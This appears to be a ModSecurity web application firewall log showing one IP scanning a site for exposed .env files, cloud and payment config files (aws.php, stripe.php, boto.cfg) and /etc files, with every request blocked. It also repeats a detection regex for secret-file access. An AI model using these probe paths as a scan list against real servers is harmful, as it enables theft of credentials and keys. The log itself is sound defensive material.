[Tue May 26 14:16:57.891189 2026] [security2:error] [pid 598542:tid 598627] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/api-node/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JUCQAAP1Q"]
[Tue May 26 14:16:57.939228 2026] [security2:error] [pid 598542:tid 598630] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JUCwAAP1c"]
[Tue May 26 14:16:58.035683 2026] [security2:error] [pid 598542:tid 598564] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/api/info.php"] [unique_id "ahVeAv4iWyZxnXeAW3JUGwAAPxU"]
[Tue May 26 14:16:58.115946 2026] [security2:error] [pid 598542:tid 598619] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/administrator/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JUBgAAP0w"]
[Tue May 26 14:16:58.125887 2026] [security2:error] [pid 598542:tid 598641] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/api/phpinfo.php"] [unique_id "ahVeAv4iWyZxnXeAW3JUIwAAeWI"]
[Tue May 26 14:16:58.202835 2026] [security2:error] [pid 598542:tid 598652] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/apis/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUNAAAFW0"]
[Tue May 26 14:16:58.289184 2026] [security2:error] [pid 598542:tid 598596] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUPQAAbTU"]
[Tue May 26 14:16:58.486456 2026] [security2:error] [pid 598542:tid 598557] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/application/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUVwAAFw4"]
[Tue May 26 14:16:58.500843 2026] [security2:error] [pid 598542:tid 598556] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/apps/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUWAAAQg0"]
[Tue May 26 14:16:58.608153 2026] [security2:error] [pid 598542:tid 598763] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeAv4iWyZxnXeAW3JUKQAAAFs"]
[Tue May 26 14:16:58.791297 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/back-api/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUfgAAXxA"]
[Tue May 26 14:16:58.801384 2026] [security2:error] [pid 598542:tid 598600] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/back-end/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUfwAAHzk"]
[Tue May 26 14:16:58.803349 2026] [security2:error] [pid 598542:tid 598560] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backend-api/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUgQAAfxE"]
[Tue May 26 14:16:58.803523 2026] [security2:error] [pid 598542:tid 598646] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/back/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUgAAAf2c"]
[Tue May 26 14:16:58.817968 2026] [security2:error] [pid 598542:tid 598601] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUggAAOTo"]
[Tue May 26 14:16:58.941953 2026] [security2:error] [pid 598542:tid 598611] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backup/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUjwAAB0Q"]
[Tue May 26 14:16:58.947545 2026] [security2:error] [pid 598542:tid 598614] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/be/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUkAAAe0c"]
[Tue May 26 14:16:58.950510 2026] [security2:error] [pid 598542:tid 598638] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/beta/.env"] [unique_id "ahVeAv4iWyZxnXeAW3JUkQAAWV8"]
[Tue May 26 14:16:59.038094 2026] [security2:error] [pid 598542:tid 598617] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/client/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JUnQAAZko"]
[Tue May 26 14:16:59.074675 2026] [security2:error] [pid 598542:tid 598621] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/cms/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JUoQAAVU4"]
[Tue May 26 14:16:59.116810 2026] [security2:error] [pid 598542:tid 598627] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUqwAAD1Q"]
[Tue May 26 14:16:59.184902 2026] [security2:error] [pid 598542:tid 598587] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JUsgAAJSw"]
[Tue May 26 14:16:59.235377 2026] [security2:error] [pid 598542:tid 598564] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/aws.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUtwAAMxU"]
[Tue May 26 14:16:59.252505 2026] [security2:error] [pid 598542:tid 598657] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/config.inc.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUuwAANHI"]
[Tue May 26 14:16:59.274448 2026] [security2:error] [pid 598542:tid 598568] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/config.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUwAAAdhk"]
[Tue May 26 14:16:59.329909 2026] [security2:error] [pid 598542:tid 598544] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/env.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUyAAAQgE"]
[Tue May 26 14:16:59.374249 2026] [security2:error] [pid 598542:tid 598618] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/module.config.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUywAAEks"]
[Tue May 26 14:16:59.375131 2026] [security2:error] [pid 598542:tid 598566] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/nexmo.php"] [unique_id "ahVeA_4iWyZxnXeAW3JUzAAAEhc"]
[Tue May 26 14:16:59.412227 2026] [security2:error] [pid 598542:tid 598647] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/config/stripe.php"] [unique_id "ahVeA_4iWyZxnXeAW3JU0QAAJGg"]
[Tue May 26 14:16:59.591576 2026] [security2:error] [pid 598542:tid 598645] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/crm/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU5QAAXmY"]
[Tue May 26 14:16:59.593490 2026] [security2:error] [pid 598542:tid 598548] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/cron/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU5wAAXgU"]
[Tue May 26 14:16:59.626645 2026] [security2:error] [pid 598542:tid 598558] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/current/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU6AAAcQ8"]
[Tue May 26 14:16:59.661519 2026] [security2:error] [pid 598542:tid 598557] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/demo/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU6gAACw4"]
[Tue May 26 14:16:59.680581 2026] [security2:error] [pid 598542:tid 598563] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/dev/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU8AAAHRQ"]
[Tue May 26 14:16:59.695025 2026] [security2:error] [pid 598542:tid 598569] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/develop/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU8gAAFho"]
[Tue May 26 14:16:59.704104 2026] [security2:error] [pid 598542:tid 598586] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/developer/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU8wAAHys"]
[Tue May 26 14:16:59.712854 2026] [security2:error] [pid 598542:tid 598575] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/development/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JU9QAAESA"]
[Tue May 26 14:16:59.867204 2026] [security2:error] [pid 598542:tid 598588] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/erp/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JVDAAAWS0"]
[Tue May 26 14:16:59.890600 2026] [security2:error] [pid 598542:tid 598594] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVeA_4iWyZxnXeAW3JVDQAAKDM"]
[Tue May 26 14:16:59.899525 2026] [security2:error] [pid 598542:tid 598592] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/etc/boto.cfg"] [unique_id "ahVeA_4iWyZxnXeAW3JVDwAAKDE"]
[Tue May 26 14:16:59.901072 2026] [security2:error] [pid 598542:tid 598578] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/fe/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JVEAAAKCM"]
